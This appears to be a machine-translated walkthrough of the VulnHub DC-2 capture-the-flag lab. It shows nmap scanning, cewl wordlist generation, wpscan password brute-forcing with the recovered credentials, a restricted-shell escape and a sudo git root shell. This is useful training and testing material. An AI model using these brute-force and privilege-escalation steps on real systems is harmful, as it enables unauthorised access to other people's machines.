For details of DC-2, please visit: https://www.vulnhub.com/entry/dc-2,311/
Target machine environment VIrtualBox, connected to the VirtualBox Host-Onlynetwork card, IP:192.168.56.103
Attack machine environment VMware, bridge mode, bridge to VIrtualBox Host-Onlynetwork card, IP:192.168.56.177
Scan for surviving hosts in segment C
arp-scan -l
or
nmap -sP 192.168.56.1/24
Visit http://192.168.56.103found to be redirected tohttp://dc-2
modify/etc/hosts
Nmap scans the target machine to collect information
nmap -Pn -sSV -A -p- -T5 192.168.56.103
Found on the site flag1and prompted to usecewl
PS: It
Cewlis an application developed by Ruby, which can return a dictionary file by crawling the URL address for use by blasting tools
Use cewlcrawl sites to generate dictionaries
cewl -w dc2_password.txt http://dc-2/
WPscanEnumerate site users
wpscan --url http://dc-2/ -e u
Use the cewlgenerated dictionary to blast
wpscan --url http://dc-2/ -P /home/mochu7/Desktop/dc2_password.txt --max-threads 100
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Login to jerrygetflag2
tomAccount can log in with SSH
PS: The ssh port here is not the 22previous port scan and it can be seen that the ssh port is7744
tomUser shell is restricted and many commands cannot be used
Read here flag3.txtcan be read by lesscommand, no need to escalate privilege
Use of rights:
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin
flag3
flag4
And the jerryuser can not log in before testing ssh, but you can switch directly here
According to flag4the prompts, here should gitbe an rootauthorization , first check which commands can be used without a password, that is, sudocan be executed without a password
The next step is gitto raise rights
Reference article: https://gtfobins.github.io/gtfobins/git/
sudo git -p help config
!/bin/sh
final-flag
